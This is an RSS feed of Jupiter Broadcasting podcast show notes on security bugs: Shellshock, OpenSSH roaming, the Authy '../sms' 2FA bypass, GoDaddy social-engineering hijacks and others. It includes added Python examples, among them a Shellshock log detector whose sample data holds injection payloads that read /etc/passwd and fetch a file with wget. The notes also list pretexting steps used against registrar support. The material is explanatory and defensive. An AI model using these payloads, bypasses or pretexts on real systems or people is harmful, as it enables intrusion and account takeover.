bug – Jupiter Broadcasting (https://www.jupiterbroadcasting.com): Open Source Entertainment, on Demand. Feed generated Mon, 14 Mar 2022 02:33:55 +0000.

Bugfix and Chill | LINUX Unplugged 449
https://original.jupiterbroadcasting.net/147902/bugfix-and-chill-linux-unplugged-449/ (Sun, 13 Mar 2022 18:30:00 +0000)

Show Notes: linuxunplugged.com/449

The post Bugfix and Chill | LINUX Unplugged 449 first appeared on Jupiter Broadcasting.

RedHat with Brandon Johnson | Ask Noah 44
https://original.jupiterbroadcasting.net/121292/redhat-with-brandon-johnson-ask-noah-44/ (Wed, 10 Jan 2018 01:59:18 +0000)

The Cliff Notes:
  • Problem Booting Windows with AMD
  • Meltdown and Spectre for Non Technical Users
  • Meltdown and Spectre the Battle Continues
  • Meltdown Attack Simply Explained
  • What RedHat says You Need to Know
  • Microsoft […]

The post RedHat with Brandon Johnson | Ask Noah 44 first appeared on Jupiter Broadcasting.

RSS Feeds:

MP3 Feed | HD Video Feed | iTunes Feed

Become a supporter on Patreon:

Patreon

— Show Notes: —

— The Cliff Notes —

— Stay In Touch —

Find all the resources for this show on the Ask Noah Dashboard

Ask Noah Dashboard

Need more help than a radio show can offer? Altispeed provides commercial IT services and they’re excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show!

Altispeed Technologies

Contact Noah

asknoah [at] jupiterbroadcasting.com

— Twitter —

Meltdown & Spectre | Ask Noah 43
https://original.jupiterbroadcasting.net/121182/meltdown-spectre-ask-noah-43/ (Sat, 06 Jan 2018 10:42:38 +0000)

The Cliff Notes:
  • RedHat Opens up Resources For You
  • RedHat Resources
  • Linus Torvalds Advice to Intel
  • Intel CEO Sale of Stock Before Security Bug Reveal
  • Intel Bug Performance Hit
  • Intel Bug Fix Kernel […]

The post Meltdown & Spectre | Ask Noah 43 first appeared on Jupiter Broadcasting.

Three C’s to Tweet By | TechSNAP 304
https://original.jupiterbroadcasting.net/106551/three-cs-to-tweet-by-techsnap-304/ (Wed, 01 Feb 2017 01:23:17 +0000)

The post Three C's to Tweet By | TechSNAP 304 first appeared on Jupiter Broadcasting.


Show Notes:

Dropbox Kept Files Around For Years Due To ‘Delete’ Bug

  • Dropbox has fixed a bug that caused old, deleted data to reappear on the site. The bug was reported by multiple support threads in the last three weeks and merged into one issue here. An anonymous Slashdot reader writes
  • In some of the complaints users reported seeing folders they deleted in 2009 reappear on their devices overnight. After seeing mysterious folders appear in their profile, some users thought they were hacked. Last week, a Dropbox employee provided an explanation of what happened, blaming the issue on an old bug that affected the metadata of soon-to-be-deleted folders. Instead of deleting the files, as users wanted and regardless of metadata issues, Dropbox chose to keep those files around for years, and eventually restored them due to a blunder. In its File Retention Policy, Dropbox says it will keep files around a maximum of 60 days after users delete them
  • If you have sensitive data, do not rely on delete, rely on encryption.
  • If you have sensitive data, you shouldn’t have it on third-party systems without encryption.
  • The encryption and decryption should occur on your system, not theirs.
  • Imagine you deleted those risky files just before an international trip, you are asked to power up your laptop, and bang, there are those deleted files back!

Twitter Activist Security – Guidelines for safer resistance

  • We’ve covered privacy on the Internet before. We’ve stated very clearly that using privacy tools such as Tor is not illegal nor is it suspicious, no more so than someone paying cash at the grocery store.
  • This guideline is specifically for Twitter, but many of the suggestions can be applied to other social media as well, but I am not sure how well they will travel. Choose carefully
  • Many people are starting to get politically active in ways they fear might have negative repercussions for their job, career or life. It is important to realise that these fears are real, but that public overt resistance is critical for political legitimacy. This guide hopes to help reduce the personal risks to individuals while empowering their ability to act safely.
    I am not an activist, and I almost certainly don’t live in your country. These guidelines are generic with the hope that they will be useful for a larger number of people.
  • Security Principles To Live By: the basic principles of operational security are actually very simple; they’re what we call the three Cs: Cover, Concealment, Compartmentation

Move over skimmers, ‘shimmers’ are the newest tool for stealing credit card info

  • Consumers and retailers be on guard: there’s a new and more devious way for fraudsters to steal your credit and debit card information.
  • “Shimmers” are the newest form of credit card skimmers, only smaller, more powerful and practically impossible to detect. And they’re popping up all over the place, says RCMP Cpl. Michael McLaughlin, who sounded the alarm after four shimmers were extracted from checkout card readers at a Coquitlam, B.C., retailer.
  • “Something this sophisticated, this organized and multi-jurisdictional has all the classic hallmarks of organized crime,” said McLaughlin.
  • Unlike skimmers, a shimmer — named for its slim profile — fits inside a card reader and can be installed quickly and unobtrusively by a criminal who slides it into the machine while pretending to make a purchase or withdrawal.
  • Once installed, the microchips on the shimmer record information from chip cards, including the PIN. That information is later extracted when the criminal inserts a special card — also during a purchase or cash withdrawal — which downloads the data. The information is then used to make fake cards.
  • Shimmers have rendered the bigger and bulkier skimmers virtually obsolete, according to Const. Alex Bojic of the Coquitlam RCMP economic crime unit.
  • “You can’t see a shimmer from the outside like the old skimmer version,” Bojic said in a statement. “Businesses and consumers should immediately report anything abnormal about the way their card is acting … especially if the card is sticking inside the machine.”
  • McLaughlin said the Coquitlam retailer detected the shimmers through its newly introduced daily testing of point-of-sales terminals. A test card inserted into the machines kept on getting stuck and the shimmers were found when the terminals were opened.
  • “We want to get the word out,” said McLaughlin. “Businesses really need to be checking for these kinds of devices and consumers need to be aware of them.”
  • Bojic said using the tap function of a chip card is one way to avoid being “shimmed.”
    “It’s actually very secure. Each tap transfers very limited banking information, which can’t be used to clone your card,” Bojic said.
  • Krebs wrote about this and has a post which is all about skimmers and shimmers
  • Not new tech; it has been around since at least 2015

Mint 18: Convenience Over Security | LAS 426
https://original.jupiterbroadcasting.net/101212/mint-18-convenience-over-security-las-426/ (Sun, 17 Jul 2016 21:06:43 +0000)

We review Linux Mint 18 & our experience turns out to be a roller coaster ride from impressed glee to cautious concern. We’ve never felt more conflicted over a version of Linux Mint. Plus we discuss the Ubuntu Forum hack, a Fedora bug that’s bricking some laptops & why we just can’t quit FreeNAS.

The post Mint 18: Convenience Over Security | LAS 426 first appeared on Jupiter Broadcasting.

Thanks to:


DigitalOcean


Ting


Linux Academy

Direct Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | OGG Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Patreon

— Show Notes: —


System76

Brought to you by: Linux Academy

Mint 18 Review

Linux Mint 18: The best desktop — period

I’ve been using Linux desktops since the leading desktop front-end was Bash. Things have changed in those 25 years. Today, the best Linux desktop is the latest version of Linux Mint: Linux Mint 18 Sarah with the Cinnamon 3.0 interface.

Linux Mint 18 Cinnamon: Quick Screenshot Tour

Linux Mint 18 improves security, but at a cost – TechRepublic

While this is a much-needed improvement, the explanation of this change on the Linux Mint website is baffling. The website claims that kernel updates “aren’t really updates, but the availability of packages for newer kernels.” Aside from the fact that this is literally the definition of an update, this appears to be an attempt at minimizing the importance of kernel updates. In Linux Mint 18, users are only notified of kernel updates, but they are not installed by default.

As excited as we are about Linux Mint 18, upgrading blindly for the sake of running the latest version does not make much sense, especially if you’re already happy and everything is working perfectly.

Given the history of Linux Mint with their weird view on security (Linux Mint is the very definition of a FrankenDebian [1]) where they withhold important security updates because their weird mixture of packages would otherwise break too often or their hijacking of package names (mdm, for example), I don’t really trust them to come up with a clean design for desktop agnostic applications. Heck, the first thing they wanted to do was naming their forked version of Pluma “xedit”.

— PICKS —

Runs Linux

Ford Fusion Runs Linux on a Raspberry Pi

Desktop App Pick

recalbox.com

Recalbox allows you to re-play a variety of videogame consoles and platforms in your living room, with ease! RecalboxOS is free, open source and designed to let you create your very own recalbox in no time! Raspberry Pi.

Spotlight

Felony: 🔑🔥📈 Next Level PGP

Felony is an open-source pgp keychain built on the modern web with Electron, React, and Redux. Felony is the first PGP app that’s easy for anyone to use, without a tutorial. Security++ to the greatest extreme!

Coder Radio Coding Challenge


— NEWS —

Ubuntu Forums Hacked, 2 Million Users’ Details Stolen

Canonical CEO Jane Silber explains: “We were able to confirm there had been an exposure of data and shut down the Forums as a precautionary measure. Deeper investigation revealed that there was a known SQL injection vulnerability in the Forumrunner add-on in the Forums which had not yet been patched.”

The attacker was able to “download portions of the ‘user’ table which contained usernames, email addresses and IPs for 2 million users.”

Early Look at Skype for Linux and Chromebooks

Skype for Linux is no longer an afterthought for Microsoft as the company introduces new versions of Skype for Linux, Chromebooks and the Chrome web browser.

GNOME Maps Hits A Dead End, Can No Longer Display Maps

As of this week the nifty desktop navigation app can no longer fetch map tiles to display.

MapQuest, the application’s tile provider, has amended its usage policy and discontinued direct tile access. GNOME developers have the choice of paying to keep using the service or, ultimately, using a new one.

PSA: Failure to boot after kernel update on Skylake systems

So in the last couple of days a significant issue in all Fedora releases has come to our attention, affecting (so far) several systems that use the Intel ‘Skylake’ hardware platform.

CrossOver For Android Now Running On Chromebooks

CodeWeavers confirmed today that it’s possible to run CrossOver on Chromebooks now via the Android support. CodeWeavers was even able to install Steam for Windows on the Chromebooks via the CrossOver support.

Mail Bag

  • https://pastebin.com/jMJPAeXY

  • https://pastebin.com/s9NWc85s

Call Box

Catch the show LIVE SUNDAY:

— CHRIS’ STASH —

Chris’s Twitter account has changed, you’ll need to follow!

Chris Fisher (@ChrisLAS) | Twitter

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— NOAH’S STASH —

Noah’s Day Job

Altispeed Technologies

Contact Noah

noah [at] jupiterbroadcasting.com

Find us on Google+

Find us on Twitter

Follow us on Facebook

Pre SCaLE LAS | LAS 401
https://original.jupiterbroadcasting.net/92926/pre-scale-las-las-401/ (Sun, 24 Jan 2016 10:04:20 +0000)

In this special episode of LAS, we go off the rails as we buckle down & prep for our visit to SCaLE live on the air! Plus picks, your feedback & more!

The post Pre SCaLE LAS | LAS 401 first appeared on Jupiter Broadcasting.

— Show Notes: —


— PICKS —

Runs Linux

  • This Viewer’s Car Runs Linux

Desktop App Pick

reep.io | peer-to-peer filesharing made easy

With reep.io you can transfer files directly to another browser. Just point to a file you want to share. Your peer will then be able to download this file directly from you. No data is stored on a server in-between.

Weekly Spotlight

GalliumOS – A fast and lightweight Linux distro for ChromeOS devices

Feedback:

SCaLE Planning

SCaLE 14x: The Southern California Linux Expo is upon us again! I’m looking forward to seeing & sharing with everyone in the free software community in Southern California this year; last year was a blast.

SCaLE 14x is January 21-24, 2016 at the Pasadena Convention Center

Equipment Chris is bringing:

  • GoPro Hero 4
  • Zoom SGH-6 Shotgun Mic
  • Zoom H4n

Thanks to Ryan (@techhelper1):
  • Offered the use of his 99 Cadillac Seville while at SCALE

Thanks to Brian:
  • Offered his long driveway, which might or might not work.

Linux: Bug or Feature? | CR 188
https://original.jupiterbroadcasting.net/92751/linux-bug-or-feature-cr-188/ (Mon, 18 Jan 2016 17:43:33 +0000)

Ang and Mike discuss business operational tools, practices & common issues, how Ang got her kids started on computers, good languages to get started with & she makes a pretty poignant comment about Linux. Mike discusses TarDisk & whether or not he recommends it & more!

The post Linux: Bug or Feature? | CR 188 first appeared on Jupiter Broadcasting.

Internet of Threats | TechSNAP 249
https://original.jupiterbroadcasting.net/92666/internet-of-threats-techsnap-249/ (Thu, 14 Jan 2016 16:58:33 +0000)

A Critical OpenSSH flaw can expose your private keys, a new WiFi spec for IoT devices, that has all the classic issues & Intel’s SkyLake bug. Plus your feedback, our answers, a rockin’ round up & so much more!

The post Internet of Threats | TechSNAP 249 first appeared on Jupiter Broadcasting.

— Show Notes: —

Critical OpenSSH flaw can expose your private keys and other client memory

  • Two major issues have been identified in OpenSSH
  • CVE-2016-0777: An information leak (memory disclosure) can be exploited by a rogue SSH server to trick a client into leaking sensitive data from the client memory, including for example private keys.
  • Vendor-contributed code for a feature called Roaming was added in OpenSSH 5.4; it allowed broken SSH sessions to be resumed. The server-side code for this was never activated; only the commercial SSH server supported it.
  • However, the Roaming feature is on by default in the client, and due to a bug a malicious server can exploit it to read memory from the client when the client tries to connect to that server
  • This includes the ability to steal your SSH private keys
  • “The authentication of the server host key prevents exploitation by a man-in-the-middle, so this information leak is restricted to connections to malicious or compromised servers.”
  • Because OpenSSH checks the host key of the remote server, if you are connecting to trusted servers, there is no risk
  • You can disable the feature by adding the following line to your /etc/ssh/ssh_config: UseRoaming no
  • The feature can also be disabled on a per-user basis using: ~/.ssh/config
  • The patch just disabled this feature by default
  • CVE-2016-0778: A buffer overflow (leading to a file descriptor leak) can also be exploited by a rogue SSH server, but due to another bug in the code it is possibly not exploitable, and then only under certain non-default conditions: when using ProxyCommand, ForwardAgent or ForwardX11.
  • Both of these vulnerabilities are fixed in OpenSSH 7.1p2
  • It is not clear if the roaming support will be removed entirely
  • Researcher Post

Bug in Intel Skylake CPUs means complex workloads can hang the machine

  • Intel has confirmed that its Skylake processors suffer from a bug that can cause a system to freeze when performing complex workloads.
  • The bug was reportedly discovered and tested by the community at hardwareluxx.de and passed on to GIMPS (Great Internet Mersenne Prime Search), which conducted further testing. Both groups passed their findings on to Intel.
  • Intel states:

“Intel has identified an issue that potentially affects the 6th Gen Intel Core family of products. This issue only occurs under certain complex workload conditions, like those that may be encountered when running applications like Prime95. In those cases, the processor may hang or cause unpredictable system behaviour.”

  • Intel has developed a fix, and is working with hardware partners to distribute it via a BIOS update.
  • No reason has been given as to why the bug occurs, but it’s confirmed to affect both Linux and Windows-based systems.
  • While the bug was discovered using Prime95, it could affect other industries that rely on complex computational workloads, such as scientific and financial institutions.
  • Recently, Intel’s Haswell and early Broadwell processors suffered from a TSX (Transactional Synchronization Extensions) bug. Rather than recall the parts, Intel disabled the TSX instructions via a microcode update delivered via new motherboard firmware.
  • Additional Coverage

New WiFi spec for IoT devices, WiFi HaLow likely has all the classic issues

  • “The new protocol is based on the 802.11ah standard from the IEEE and is being billed as Wi-Fi HaLow by the Wi-Fi Alliance. Wi-Fi HaLow differs from the wireless signal that most current devices uses in a couple of key ways. First, it’s designed as a low-powered protocol and will operate in the range below one gigahertz. Second, the protocol will have a much longer range than traditional Wi-Fi, a feature that will make it attractive for use in applications such as connecting traffic lights and cameras in smart cities.”
  • There is also talk of using it for wearables, I suppose as a replacement for Bluetooth
  • “Wi-Fi HaLow is well suited to meet the unique needs of the Smart Home, Smart City, and industrial markets because of its ability to operate using very low power, penetrate through walls, and operate at significantly longer ranges than Wi-Fi today,” said Edgar Figueroa, president and CEO of Wi-Fi Alliance.
  • “But, as with any new protocol or system, Wi-Fi HaLow will carry with it new security considerations to face. And one of the main challenges will be securing all of the various implementations of the protocol. Device manufacturers all implement things in their own way and in their own time, a practice that has led to untold security vulnerabilities and innumerable billable hours for security consultants. Security experts don’t expect Wi-Fi HaLow to be the exception.”
  • “While the standard could be good and secure, implementations by different vendors can have weaknesses and security issues. This is common to all protocols,” said Cesar Cerrudo, CTO of IOActive Labs, who has done extensive research on the security of a wide range of smart devices and smart city environments
  • Who could possibly be worse at implementing security, than the vendors and government contractors that would be used for a “smart city”
  • “Many of the devices that may use the new protocol–which isn’t due for release for a couple of years–are being manufactured by companies that aren’t necessarily accustomed to thinking about threat modeling, potential attacks, and other issues that computer hardware and software makers have had to face for decades. That could lead to simple implementation problems that attackers can take advantage of.”
  • This seems to call for a nice clean BSD licensed implementation, although even then, everyone using the same implementation could be just as risky
  • Plus, as we have seen, most vendors will ship an old insecure version, rather than the latest, and won’t update the implementation as they iterate their product
  • The extended range of HaLow also means that attackers can come from much further away, making it harder to physically protect devices
  • “Each new iteration in technology brings with it fresh security and privacy considerations, and the proliferation of connected non-computing devices is no different. The concept of a voice-enabled hub that controls your home’s climate, entertainment, and other systems is now a reality, as is the ability to send an email from your refrigerator. That’s all well and good, until these smart devices start doing really dumb things.”

Lousy Lollipop Adoption | TTT 202
https://original.jupiterbroadcasting.net/86047/lousy-lollipop-adoption-ttt-202/ (Wed, 05 Aug 2015 10:27:09 +0000)

A fresh version of LibreOffice hits the web, another Flash attack in the wild, this one uses “malvertising”. What the heck is malvertising? We discuss. Plus what the state of Android looks like in 2015, another OS X bug & more!

The post Lousy Lollipop Adoption | TTT 202 first appeared on Jupiter Broadcasting.

EMerging Science | TTT 197
https://original.jupiterbroadcasting.net/85652/emerging-science-ttt-197/ (Tue, 28 Jul 2015 10:13:57 +0000)

The new OnePlus 2 specs, price, availability & everything else you should know are out. Motorola doubles down on Moto X with Style, Play & updates Moto G. Microsoft’s Arrow Launcher for Android, Razer acquires OUYA & Scientists confirm ‘impossible’ EM Drive propulsion.

The post EMerging Science | TTT 197 first appeared on Jupiter Broadcasting.

Two Factor Falsification | TechSNAP 206
https://original.jupiterbroadcasting.net/79162/two-factor-falsification-techsnap-206/ (Thu, 19 Mar 2015 18:47:44 +0000)

Microsoft takes 4 years to fix a nasty bug, how to bypass 2 factor authentication in the popular ‘Authy’ app. Hijacking a domain with photoshop, hardware vs software RAID revisited, tons of great questions, our answers & much much more!

The post Two Factor Falsification | TechSNAP 206 first appeared on Jupiter Broadcasting.

— Show Notes: —

Microsoft took 4 years to recover privileged TLS certificate addresses

  • The way TLS certificates are issued currently is not always foolproof
  • In order to get a TLS certificate, you must prove you own the domain that you are attempting to request the certificate for
  • Usually, the way this is done is sending an email to one of the administrative addresses at the domain, like postmaster@, hostmaster@, administrator@, or abuse@
  • The problem comes when webmail services, like Hotmail, allow these usernames to be registered by ordinary users
  • That is exactly what happened with Microsoft’s live.be and live.fi
  • A Finnish man reported to Microsoft that he had been able to get a valid HTTPS certificate for live.fi by registering the address hostmaster@live.fi
  • It took Microsoft four to six weeks to solve the problem
  • Additional Coverage – Ars Technica
  • When this news story came out, another man, from Belgium, came forward to say he reported the same problem with live.be over 4 years ago
  • “After the Finnish man used his address to obtain a TLS certificate for the live.fi domain, Microsoft warned users it could be used in man-in-the-middle and phishing attacks. To foreclose any chance of abuse, Microsoft advised users to install an update that will prevent Internet Explorer from trusting the unauthorized credential. By leaving similar addresses unsecured, similar risks may have existed for years.”

Bypass 2 factor authentication in popular ‘Authy’ app

  • Authy is a popular reusable 2 factor authentication API
  • It allows 3rd party sites to easily implement 2 factor authentication
  • Maybe a little too easily
  • When asked for the verification code that is sent to your phone after a request to Authy is received, simply entering ../sms gives you access to the application
  • The problem is that the 3rd party sites send the request, and just look for a ‘success’ response
  • However, because the input is interpolated into the URL path, the code you enter is not sent to https://api.authy.com/protected/json/verify/1234/authy_id as expected
  • But rather, the url ends up being: https://api.authy.com/protected/json/verify/../sms/authy_id
  • Which is actually interpreted by the Authy API as: https://api.authy.com/protected/json/sms/authy_id
  • This API call is the one used to actually send the code to the user
  • This call sends another token to the user and returns success
  • The 3rd party application sees the ‘success’ part, and allows the user access
  • It seems like a weak design: the verify call should return something that only a successful verification can produce, and the implementation instructions for the API should be explicit about checking “token”:”is valid” rather than just “success”:true
  • Also, the middleware should not unescape the user input and then parse it as part of the URL path; a verification code can be checked for being a short string of digits before it is used at all
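The traversal above, as an added example (not the show’s or Authy’s code): a Python mock of the two routes stands in for api.authy.com and is assumed to normalize dot segments before routing, as HTTP stacks commonly do. The integration pattern the notes describe sits beside a hardened version. The route paths and the “token”:”is valid” field come from the notes; the mock class, the 4-8 digit code rule and the authy_id value are assumptions.

```python
import posixpath
import re
from urllib.parse import quote


class MockAuthyApi:
    """Constructed stand-in for the two Authy routes named in the show notes.

    Assumption: the path is normalized (dot segments collapsed) before routing,
    which is exactly what turns verify/../sms/<id> into sms/<id>.
    """

    def __init__(self, valid_token="1234"):
        self.valid_token = valid_token
        self.sms_sent = 0  # counts hits on the SMS route

    def request(self, path):
        normalized = posixpath.normpath(path)
        m = re.fullmatch(r"/protected/json/sms/(\d+)", normalized)
        if m:
            self.sms_sent += 1
            return {"success": True, "message": "SMS token was sent"}
        m = re.fullmatch(r"/protected/json/verify/([^/]+)/(\d+)", normalized)
        if m:
            if m.group(1) == self.valid_token:
                return {"success": True, "token": "is valid"}
            return {"success": False, "errors": {"message": "Token is invalid"}}
        return {"success": False, "errors": {"message": "not found"}}


def verify_vulnerable(api, user_token, authy_id):
    """The integration pattern the notes describe: raw input in the path,
    and only the 'success' flag is checked."""
    resp = api.request(f"/protected/json/verify/{user_token}/{authy_id}")
    return resp.get("success") is True


def verify_hardened(api, user_token, authy_id):
    """Reject anything that is not a short digit string, URL-encode what is
    left, and require the verify-specific field, not just 'success'."""
    # Assumption: codes are 4-8 digits. "../sms" never gets near the URL.
    if not isinstance(user_token, str) or not re.fullmatch(r"\d{4,8}", user_token):
        return False
    path = f"/protected/json/verify/{quote(user_token, safe='')}/{int(authy_id)}"
    resp = api.request(path)
    return resp.get("success") is True and resp.get("token") == "is valid"


def demo():
    """Run both clients against the mock; returns a dict of outcomes."""
    api = MockAuthyApi(valid_token="1234")
    return {
        "vuln_bypass": verify_vulnerable(api, "../sms", 42),   # True: SMS route says success
        "vuln_wrong_code": verify_vulnerable(api, "0000", 42),
        "hard_bypass": verify_hardened(api, "../sms", 42),     # False: rejected before the request
        "hard_good_code": verify_hardened(api, "1234", 42),
        "hard_wrong_code": verify_hardened(api, "0000", 42),
        "sms_sent": api.sms_sent,                              # 1: only the bypass reached sms/
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The two fixes are independent and both are worth having: input validation stops the traversal from being built at all, and checking the verify-specific response field means a success from any other endpoint is not mistaken for a verified code.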

Hijacking a domain

  • An article where a reporter had a security researcher steal his GoDaddy account, and document how it was done
  • A combination of social engineering, publicly available information, and a photoshopped government ID allowed the security researcher to take over the GoDaddy account, and all of the domains inside of it
  • This could allow:
  • an attacker to inject malware into your site
  • redirect your email, capturing password reset emails from other services
  • redirect traffic from your website to their own
  • issue new SSL certificates for your sites, allowing them to perform man-in-the-middle attacks on your visitors with a valid SSL certificate
  • Some of the social engineering steps:
    • Create a fake Social Media profile in the name of the victim (with the fake picture of them)

    • Create a gmail address in the name of the victim

    • Call and use myriad plausible excuses why you do not have the required information:
    • please provide your pin #? I don’t remember setting up a pin number
    • my assistant registered the domain for me, so I don’t have access to the email address used
    • my assistant used the credit card ending in: 4 made up numbers
    • create a sense of urgency: “I apologized, both for not having the information and for my daughter yelling in the background. She laughed and said it wasn’t a problem”
    • GoDaddy requires additional verification if the domain is registered to a business; however, since many people make up a business name when they register a domain, it is very common for these businesses not to actually exist, and there are loopholes
    • Often, a letter on a fake letterhead will be accepted
  • In the end, Customer Support reps are there to help the customer, it is usually rather difficult for them to get away with refusing to help the customer because they lack the required details, or seem suspicious
  • GoDaddy’s automated system sends notifications when changes are made; however, in this case that is often too late, as the attacker has already compromised your account
  • GoDaddy issued a response: “GoDaddy has stringent processes and a dedicated team in place for verifying the identification of customers when a change of account/email is requested. While our processes and team are extremely effective at thwarting illegal requests, no system is 100 percent efficient. Falsifying government issued identification is a crime, even when consent is given, that we take very seriously and will report to law enforcement where appropriate.”
  • It appears that Hover.com (owned by Tucows, the same company that owns Ting) is one of the only registrars that does not allow photo ID as a form of verification, stating “anyone could just whip something up in Photoshop.”
  • GoDaddy notes that forging government ID (in photoshop or otherwise) is illegal

Feedback:


Round Up:


The post Two Factor Falsification | TechSNAP 206 first appeared on Jupiter Broadcasting.

Weaponized Bash | Linux Action Show 332 https://original.jupiterbroadcasting.net/67717/weaponized-bash-linux-action-show-332/ Sun, 28 Sep 2014 16:46:08 +0000 https://original.jupiterbroadcasting.net/?p=67717 The Shellshock bug is taking the internet by storm, Fedora project lead Matthew Miller joins us to discuss how this Bash bug works, how big of a problem it really is, and how large projects are responding to the issue. Plus we chat a little Fedora.next and more! Then it’s our look at what’s great […]

The post Weaponized Bash | Linux Action Show 332 first appeared on Jupiter Broadcasting.


The Shellshock bug is taking the internet by storm, Fedora project lead Matthew Miller joins us to discuss how this Bash bug works, how big of a problem it really is, and how large projects are responding to the issue. Plus we chat a little Fedora.next and more!

Then it’s our look at what’s great in Gnome 3.14, Ubuntu 14.10 & another systemd alternative that’s doing it right.

Thanks to:


DigitalOcean


Ting

Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | Ogg Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Feed | Ogg Feed | iTunes Feeds | Torrent Feed

Become a supporter on Patreon:


— Show Notes: —

Shellshock with Matthew Miller – FedoraProject


System76

Brought to you by: System76

Shellshock BASH Vulnerability Tester

Shellshock (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) is a vulnerability in GNU’s bash shell that gives attackers access to run remote commands on a vulnerable system. If your system has not updated bash in the last 24 hours (See patch history), you’re most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD.

Shellshock: How does it actually work? | Fedora Magazine

And there’s quite a lot of other little cleanups in there too — security people at Fedora, at Red Hat, and around the world sure have been busy for the couple of days. Thanks to all of you for your hard work, and to Fedora’s awesome QA and Release Engineering teams, who sprung into action to make sure that these updates got to you quickly and safely.

Still more vulnerabilities in bash? Shellshock becomes whack-a-mole | Ars Technica

Here’s how the Shellshock vulnerability works, in a nutshell: an attacker sends a request to a Web server (or Git, a DHCP client, or anything else affected) that uses bash internally to interact with the operating system. This request includes data stored in an environmental variable. Environmental variables are like a clipboard for operating systems, storing information used to help it and software running on it know where to look for certain files or what configuration to start with. But in this case, the data is malformed so as to trick bash into treating it as a command, and that command is executed as part of what would normally be a benign set of script. This ability to trick bash is the shellshock bug. As a result, the attacker can run programs with the same level of access as the part of the system launching a bash shell.

Shellshock just ‘a blip’ says Richard Stallman as Bash bug attacks increase | Technology

GNU Project founder: ‘Any program can have a bug. But a proprietary program is likely to have intentional bugs’

The bash vulnerability and Docker containers | Colin Walters

In a previous post about Docker, I happened to randomly pick bash as a package shared between the host and containers. I had thought of it as a relatively innocent package, but the choice turned out to be prescient. The bash vulnerability announced today shows just how important even those apparently innocent packages can be.

shellshock – What does env x='() { :;}; command’ bash do and why is it insecure? – Unix & Linux Stack Exchange

bash stores exported function definitions as environment variables. Exported functions look like this:

$ foo() { bar; }
$ export -f foo
$ env | grep -A1 foo
foo=() {  bar
}

That is, the environment variable foo has the literal contents:

() {  bar
}

When a new instance of bash launches, it looks for these specially crafted environment variables, and interprets them as function definitions. You can even write one yourself, and see that it still works:

$ export foo='() { echo "Inside function"; }'
$ bash -c 'foo'
Inside function

Unfortunately, the parsing of function definitions from strings (the environment variables) can have wider effects than intended. In unpatched versions, it also interprets arbitrary commands that occur after the termination of the function definition. This is due to insufficient constraints in the determination of acceptable function-like strings in the environment. For example:

$ export foo='() { echo "Inside function" ; }; echo "Executed echo"'
$ bash -c 'foo'
Executed echo
Inside function

Note that the echo outside the function definition has been unexpectedly executed during bash startup. The function definition is just a step to get the evaluation and exploit to happen, the function definition itself and the environment variable used are arbitrary. The shell looks at the environment variables, sees foo, which looks like it meets the constraints it knows about what a function definition looks like, and it evaluates the line, unintentionally also executing the echo (which could be any command, malicious or not).

This is considered insecure because variables are not typically allowed or expected, by themselves, to directly cause the invocation of arbitrary code contained in them. Perhaps your program sets environment variables from untrusted user input. It would be highly unexpected that those environment variables could be manipulated in such a way that the user could run arbitrary commands without your explicit intent to do so using that environment variable for such a reason declared in the code.
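An added example (not from the show, Fedora or the Stack Exchange post) of the vector the Ars excerpt describes: a CGI gateway copies request headers into environment variables, so a header value beginning with “() {” reaches bash’s exported-function parser. The Python below builds that environment from constructed headers and scans constructed access-log lines for the same prefix. The header-to-variable mapping follows the CGI convention (HTTP_ prefix, upper case, dashes to underscores); the sample requests and addresses are made up; and the whitespace-tolerant regex is a detection choice, since bash itself keyed on the literal four-character prefix “() {”.

```python
import re

# Pre-patch bash treated ANY environment variable whose value starts with "() {"
# as an exported function definition and kept parsing (and executing) past the
# closing brace. The regex is deliberately looser than bash's literal check so
# that near-miss probes are flagged too.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")


def cgi_env_from_headers(headers):
    """Map (name, value) request headers to the environment a CGI gateway
    hands to the script: HTTP_ prefix, upper case, '-' becomes '_'."""
    env = {}
    for name, value in headers:
        env["HTTP_" + name.strip().upper().replace("-", "_")] = value
    return env


def find_shellshock_vars(env):
    """Names of environment variables whose value carries the function-definition prefix."""
    return sorted(k for k, v in env.items() if SHELLSHOCK_RE.match(v))


def scan_access_log(lines):
    """Return combined-log-format lines where any quoted field (request line,
    Referer, User-Agent) starts with the prefix."""
    hits = []
    for line in lines:
        quoted = re.findall(r'"([^"]*)"', line)
        if any(SHELLSHOCK_RE.match(q) for q in quoted):
            hits.append(line)
    return hits


# Constructed sample input (not real traffic); addresses are documentation ranges.
SAMPLE_HEADERS = [
    ("Host", "example.test"),
    ("User-Agent", "() { :;}; /bin/bash -c 'cat /etc/passwd'"),
    ("Referer", "https://example.test/"),
    ("Cookie", "() { ignored;}; /usr/bin/id"),
]

SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Sep/2014:10:00:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \'wget http://203.0.113.9/x -O /tmp/x\'"',
    '198.51.100.3 - - [25/Sep/2014:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { :; }; ping -c 1 198.51.100.3" "curl/7.38.0"',
]


if __name__ == "__main__":
    env = cgi_env_from_headers(SAMPLE_HEADERS)
    print("tainted variables:", find_shellshock_vars(env))
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious:", hit)
```

Note that the third log line targets a static page, not a CGI script; attackers sprayed the payload at everything, so the detection keys on the header value rather than the path.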


— PICKS —

Runs Linux

India’s Mission to Mars, runs Linux

India has made history today by being the first and only country in the world to send a space craft to Mars in first attempt. The country also made history as it achieved it in a budget lesser than the un-scientific Hollywood block buster Gravity; India spent only $71 million on the mission.

Desktop App Pick

